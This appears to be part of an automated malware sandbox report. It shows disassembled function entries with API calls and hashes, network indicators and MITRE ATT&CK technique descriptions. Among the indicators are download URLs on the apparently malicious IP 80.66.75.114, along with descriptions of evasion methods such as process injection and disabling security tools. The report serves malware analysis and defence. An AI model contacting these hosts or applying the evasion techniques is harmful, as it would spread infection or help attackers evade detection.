Opcode Fuzzy Hash: ef9be96c18c71de3348f79a9507502d7f71bc1826194ce81bdb771ff23fd9940
Instruction Fuzzy Hash: DEF08271005040AB9730AB25FD98C6F77B8FBCE716B00223AF240D15208B281841DA2D

Function 0041BBAA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0041B686,?,00000001,?,00000001,?,00419E17,?,?,00000001), ref: 0041BBC1
GetLastError.KERNEL32(?,0041B686,?,00000001,?,00000001,?,00419E17,?,?,00000001,?,00000001,?,0041A363,00411A53), ref: 0041BBCD

Part of subcall function 0041BB93: CloseHandle.KERNEL32(FFFFFFFE,0041BBDD,?,0041B686,?,00000001,?,00000001,?,00419E17,?,?,00000001,?,00000001), ref: 0041BBA3

___initconout.LIBCMT ref: 0041BBDD

Part of subcall function 0041BB55: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041BB84,0041B673,00000001,?,00419E17,?,?,00000001,?), ref: 0041BB68

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0041B686,?,00000001,?,00000001,?,00419E17,?,?,00000001,?), ref: 0041BBF2

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f56514edf5f76c8fdf64f8b6d8be20b0c9230bcc1c5e1c46e8687e818287cf65
Instruction ID: a8f8da817f42f9b699aa9eab11198fbb11385e0d0d903d483d576f829f0a5eaa
Opcode Fuzzy Hash: f56514edf5f76c8fdf64f8b6d8be20b0c9230bcc1c5e1c46e8687e818287cf65
Instruction Fuzzy Hash: 6EF0F836500124BBCF221F92DC09ACA3F36FB093A5F008025FA0985A34CB3699A0DBD9

Function 0060BE11 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0060B8ED,?,00000001,?,00000001,?,0060A07E,?,?,00000001), ref: 0060BE28
GetLastError.KERNEL32(?,0060B8ED,?,00000001,?,00000001,?,0060A07E,?,?,00000001,?,00000001,?,0060A5CA,00601CBA), ref: 0060BE34

Part of subcall function 0060BDFA: CloseHandle.KERNEL32(0042AA20,0060BE44,?,0060B8ED,?,00000001,?,00000001,?,0060A07E,?,?,00000001,?,00000001), ref: 0060BE0A

___initconout.LIBCMT ref: 0060BE44

Part of subcall function 0060BDBC: CreateFileW.KERNEL32(00426D28,40000000,00000003,00000000,00000003,00000000,00000000,0060BDEB,0060B8DA,00000001,?,0060A07E,?,?,00000001,?), ref: 0060BDCF

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0060B8ED,?,00000001,?,00000001,?,0060A07E,?,?,00000001,?), ref: 0060BE59

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f56514edf5f76c8fdf64f8b6d8be20b0c9230bcc1c5e1c46e8687e818287cf65
Instruction ID: 38609ba797512c3735e2eaaf979b7daf1d3b4ed55ec284a04496e5f3c0921419
Opcode Fuzzy Hash: f56514edf5f76c8fdf64f8b6d8be20b0c9230bcc1c5e1c46e8687e818287cf65
Instruction Fuzzy Hash: FBF0F836940124BBCF222F91DC099CA3F26FF093A0F049024FA0995271CB328920DB95

Function 00407F04 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00407EA1,00000064), ref: 00407F27
LeaveCriticalSection.KERNEL32(0042B3A4,0042BC84,?,00407EA1,00000064,?,?,?,00401047,0042BC84), ref: 00407F31
WaitForSingleObjectEx.KERNEL32(0042BC84,00000000,?,00407EA1,00000064,?,?,?,00401047,0042BC84), ref: 00407F42
EnterCriticalSection.KERNEL32(0042B3A4,?,00407EA1,00000064,?,?,?,00401047,0042BC84), ref: 00407F49

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 9f2013559988f7c6e19921341529abce574c139b58d20d3fca146c150821c153
Instruction ID: 3cff7d9018c211d1ea355ed61775e4ee357706ab296afc422ed0abd6618b206e
Opcode Fuzzy Hash: 9f2013559988f7c6e19921341529abce574c139b58d20d3fca146c150821c153
Instruction Fuzzy Hash: 53E06532A41134EBCB21AB50EC08B893F29EB08B24BA48032FE0962264C77418029BDD

Function 0040E6B7 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0040E6C0

Part of subcall function 004110CB: RtlFreeHeap.NTDLL(00000000,00000000,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?), ref: 004110E1
Part of subcall function 004110CB: GetLastError.KERNEL32(?,?,004174E5,?,00000000,?,?,?,00417788,?,00000007,?,?,00417C7B,?,?), ref: 004110F3

_free.LIBCMT ref: 0040E6D3
_free.LIBCMT ref: 0040E6E4
_free.LIBCMT ref: 0040E6F5

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ccdf954d04fc8f255349c7a670554957d5ba8cecce87922c9c443289696def22
Instruction ID: 49e73976e62d5fba9626ce12dd2bb37b5ba18c883bc0564894f148174147a3a8
Opcode Fuzzy Hash: ccdf954d04fc8f255349c7a670554957d5ba8cecce87922c9c443289696def22
Instruction Fuzzy Hash: EFE01A76E015A0DA86312F21BD1148A3FA1E70874438005ABF80002A35C7351593BFCC

Function 005FE91E Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005FE927

Part of subcall function 00601332: HeapFree.KERNEL32(00000000,00000000,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?), ref: 00601348
Part of subcall function 00601332: GetLastError.KERNEL32(?,?,0060774C,?,00000000,?,?,?,006079EF,?,00000007,?,?,00607EE2,?,?), ref: 0060135A

_free.LIBCMT ref: 005FE93A
_free.LIBCMT ref: 005FE94B
_free.LIBCMT ref: 005FE95C

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e71323f44a99b6628aa061ced914fc79557b72482b635806e2e22bd10e67003e
Instruction ID: 2a4566595809cc342bb212b5cfcab4c09e11a040a6322ef3cd7e524dae6cc769
Opcode Fuzzy Hash: e71323f44a99b6628aa061ced914fc79557b72482b635806e2e22bd10e67003e
Instruction Fuzzy Hash: F0E0B6B6A90124DACA7AAF24BC0248B3F62F7557003C542AAF8001AE75DB351913AFCD

Function 004028C0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00402A56
___std_exception_destroy.LIBVCRUNTIME ref: 00402AF0

Strings

*@, xrefs: 00402A9C

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: *@
API String ID: 2970364248-4253423908
Opcode ID: 11641c76190b1ca651c60fafb1633db75dd2fd133000765679391c234cdacfc4
Instruction ID: af18093e2d4331d43aeba8cff31557f80e89629d633b425e87ad75d79085b5d0
Opcode Fuzzy Hash: 11641c76190b1ca651c60fafb1633db75dd2fd133000765679391c234cdacfc4
Instruction Fuzzy Hash: E8719271E002089BDB05DF98C985BDEFBB5EF49314F14812EE815B72C1D778A984CBA9

Function 0040D4AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0040D53D

Strings

pow, xrefs: 0040D515, 0040D532

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: da6b2b219796ba4924b65b033144070afe40f9c401ad1dbe4a129ada25b9cd2b
Instruction ID: 5a8a1f4885fddb262a61cdbe81987dd01fc30636df07e1a3e80a7ba02e4253c7
Opcode Fuzzy Hash: da6b2b219796ba4924b65b033144070afe40f9c401ad1dbe4a129ada25b9cd2b
Instruction Fuzzy Hash: 91516871E0C101A6CB11BB58CD017BB2B90DB80755F204D7BE4D9523E9EA3CDCDA9A4E

Function 005FD714 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 005FD7A4

Strings

pow, xrefs: 005FD77C, 005FD799

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: da6b2b219796ba4924b65b033144070afe40f9c401ad1dbe4a129ada25b9cd2b
Instruction ID: 075c6283dd5dceb2af9a5b28224a8bc39ee8791b652181bd3422b77fade2685e
Opcode Fuzzy Hash: da6b2b219796ba4924b65b033144070afe40f9c401ad1dbe4a129ada25b9cd2b
Instruction Fuzzy Hash: 98519EA1A4610996CB397714DA113BB3FB2FF40740F304D68E285863EDEF394C96DA5A

Function 0040DD3D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 0040DD80, 0040DD87, 0040DDBD

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-1957095476
Opcode ID: d4eac7007fd804f5885b5bbd8612354c25ffa1c96ce1d56638b7cd0be3c760b0
Instruction ID: c34949102eeece68fde9ed73ee35cdf52d663821a50c4aa9f1373ca22db8c0ea
Opcode Fuzzy Hash: d4eac7007fd804f5885b5bbd8612354c25ffa1c96ce1d56638b7cd0be3c760b0
Instruction Fuzzy Hash: 59419571E00614ABCB219FD9DC81D9FBBB8EF95700B1000BBF504A7291D7789E45DB99

Function 005FDFA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 005FDFE7, 005FDFEE, 005FE024

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-1957095476
Opcode ID: d2391db26a13bc108dfe942280be3dda2d881102ffa6965f1c52c1536fea4331
Instruction ID: d2d32b6ca1ba6c614e1151e32c7e699d5c4cfd5b359815bab6bfb2425a2ae83b
Opcode Fuzzy Hash: d2391db26a13bc108dfe942280be3dda2d881102ffa6965f1c52c1536fea4331
Instruction Fuzzy Hash: FB41A471E0021DABDB25DF99CC8A9BEBFBDFB84300B14406AF60197261DBB45A41DB94

Function 005FAAC7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 005FAB06
__IsNonwritableInCurrentImage.LIBCMT ref: 005FABBA

Strings

csm, xrefs: 005FABA4

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 8f8e251228443eed14cd416bef5f8e2c82130d9abc7c1c57839264c89e9358e2
Instruction ID: ab98c36e55a08dd66793d1bf30bd859d0dc9970d8c4cade437c808879112cf08
Opcode Fuzzy Hash: 8f8e251228443eed14cd416bef5f8e2c82130d9abc7c1c57839264c89e9358e2
Instruction Fuzzy Hash: 7841C074A0021DDBCF10DF68C884ABEBFB6BF45324F148155EA189B392D7399A15CB93

Function 0040B13C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040B161

Strings

RCC, xrefs: 0040B17B
MOC, xrefs: 0040B173

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ae100e88df0cb86f2eaf0411ed39a4d57207d1203dd84f9ec849fbc16f1692c6
Instruction ID: 5dbad05113f41b9a26b439ccca8a7020f68a809fc37f17adbb68df970ead2ae8
Opcode Fuzzy Hash: ae100e88df0cb86f2eaf0411ed39a4d57207d1203dd84f9ec849fbc16f1692c6
Instruction Fuzzy Hash: B3415B71900209AFDF15DF94CD85AEEBBB5FF48304F1881AAF904B72A1D3399950DB98

Function 005FB3A3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 005FB3C8

Strings

MOC, xrefs: 005FB3DA
RCC, xrefs: 005FB3E2

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ae100e88df0cb86f2eaf0411ed39a4d57207d1203dd84f9ec849fbc16f1692c6
Instruction ID: d5e001d94a53b8178f62b8cf5ce0257f76b4a8fbf5be248c41d6352cb28943cb
Opcode Fuzzy Hash: ae100e88df0cb86f2eaf0411ed39a4d57207d1203dd84f9ec849fbc16f1692c6
Instruction Fuzzy Hash: BF41797190020DEFDF16DF94D989AAEBFB6BF48304F148059FA08A7222D3399950DB51

Function 00416755 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004167B7
_free.LIBCMT ref: 004167E5

Part of subcall function 0040D699: IsProcessorFeaturePresent.KERNEL32(00000017,00410C6C,?,00410E60,00000000,?,00000000,00000000,00401F35), ref: 0040D6B5

Part of subcall function 0040C1C4: IsProcessorFeaturePresent.KERNEL32(00000017,0040C196,?,?,004027B7,?,004010DD,00000016,?,0040C1A3,00000000,00000000,00000000,00000000,00000000,00410129), ref: 0040C1C6
Part of subcall function 0040C1C4: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 0040C1E9
Part of subcall function 0040C1C4: TerminateProcess.KERNEL32(00000000), ref: 0040C1F0

Strings

h0~, xrefs: 00416805, 00416819

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
String ID: h0~
API String ID: 1729132349-3514706242
Opcode ID: 52239b0a8a0803b6492335b51da1dcc104371d1f5f6f35a7bfb84b99b68e91a6
Instruction ID: 68881bbb32ba5fd6fb9211e38543d91af36f0c7d011e26ed7923952bc33bf6e4
Opcode Fuzzy Hash: 52239b0a8a0803b6492335b51da1dcc104371d1f5f6f35a7bfb84b99b68e91a6
Instruction Fuzzy Hash: 6F210771A042059BEB249F64D881BA677A9DF84718F25007FF914D7282E779DCC1C758

Function 006069BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00606A1E
_free.LIBCMT ref: 00606A4C

Part of subcall function 005FD900: IsProcessorFeaturePresent.KERNEL32(00000017,00600ED3,?,006010C7,00000000,?,00000000,00000000,005F219C), ref: 005FD91C

Part of subcall function 005FC42B: IsProcessorFeaturePresent.KERNEL32(00000017,005FC3FD,?,?,005F2A1E,?,005F1344,00000016,?,005FC40A,00000000,00000000,00000000,00000000,00000000,00600390), ref: 005FC42D
Part of subcall function 005FC42B: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 005FC450
Part of subcall function 005FC42B: TerminateProcess.KERNEL32(00000000), ref: 005FC457

Strings

h0~, xrefs: 00606A6C, 00606A79, 00606A80

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
String ID: h0~
API String ID: 1729132349-3514706242
Opcode ID: 7688423149b99a22bdd905aff369fd1dd7932a4652d63c8e1ee43c27ea256e44
Instruction ID: 8ea28483fbd289688d09f1d9fadfae5049d0e6293b2757895e75b97b7815fc7f
Opcode Fuzzy Hash: 7688423149b99a22bdd905aff369fd1dd7932a4652d63c8e1ee43c27ea256e44
Instruction Fuzzy Hash: 5421FF727802069FEB1CEFA4D856BA777AAEF80310F244039F905DB6C1EB72D9618754

Function 005FE2D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005FE31C

Strings

h0~, xrefs: 005FE30E

Memory Dump Source

Source File: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: _free
String ID: h0~
API String ID: 269201875-3514706242
Opcode ID: 60372ebadf338c1504935cba9e4da0269d0b2006ab3b8787e20266cb338ce1ff
Instruction ID: dec929a096c7eb8ecd582bac0cfa7973c7142f3be61f1c35c5a8273f3d752538
Opcode Fuzzy Hash: 60372ebadf338c1504935cba9e4da0269d0b2006ab3b8787e20266cb338ce1ff
Instruction Fuzzy Hash: CAE0E526A4661481D279673DAC0B27B0A86EBC2331B11063AF620870F1DF7868434199

Function 00415CFB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,00415F6C,00000000,00000000,00410E60,00410E60,00000000,?,00000000), ref: 00415D26
GetACP.KERNEL32(00000000,00415F6C,00000000,00000000,00410E60,00410E60,00000000,?,00000000), ref: 00415D3D

Strings

l_A, xrefs: 00415D03, 00415D60

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: l_A
API String ID: 0-2188696523
Opcode ID: deb7152b7f675c0f96878b39e33a12bee19661b17eb132d2b27db0da476040e5
Instruction ID: 97c7ff6bb087e31ced5d379d17d90d6707b0e38d5f478214b0567eff6a1c42d3
Opcode Fuzzy Hash: deb7152b7f675c0f96878b39e33a12bee19661b17eb132d2b27db0da476040e5
Instruction Fuzzy Hash: 47F04470900608CFDB20DB65E85C7E97B70E740339F948355D0258A5F5C7B95D86C74D

Function 00402B10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00402B2F

Strings

*@, xrefs: 00402B34
*@, xrefs: 00402B4B

Memory Dump Source

Source File: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: *@$*@
API String ID: 2659868963-2461577997
Opcode ID: 9e04c7414920ae8fd8ba933e2a3fb2a05c9517fbda6e4686fe6b439d284ed9fb
Instruction ID: 56f66303fa2bf46af8cccdb07067f389d399669fc852545c7cd048ecedfd3a37
Opcode Fuzzy Hash: 9e04c7414920ae8fd8ba933e2a3fb2a05c9517fbda6e4686fe6b439d284ed9fb
Instruction Fuzzy Hash: 4FF01CB6A00715AB8300DF59D400882F7E8FE59320354C62BE518D7600E774A564CBA4

Source: http://80.66.75.114/files/download	Virustotal: Detection: 18%	Perma Link
Source: http://80.66.75.114/6.75.114/add?substr=one&s=two	Virustotal: Detection: 9%	Perma Link
Source: http://80.66.75.114/files/download4/files/download	Virustotal: Detection: 8%	Perma Link
Source: http://80.66.75.114/files/downloadData	Virustotal: Detection: 15%	Perma Link
Source: http://80.66.75.114/	Virustotal: Detection: 16%	Perma Link
Source: http://80.66.75.114/files/downloadP	Virustotal: Detection: 12%	Perma Link
Source: http://80.66.75.114/files/downloadN	Virustotal: Detection: 8%	Perma Link
Source: http://80.66.75.114/files/downloadL	Virustotal: Detection: 9%	Perma Link
Source: http://80.66.75.114/add?substr=one&s=two	Virustotal: Detection: 15%	Perma Link

Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.75.114

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

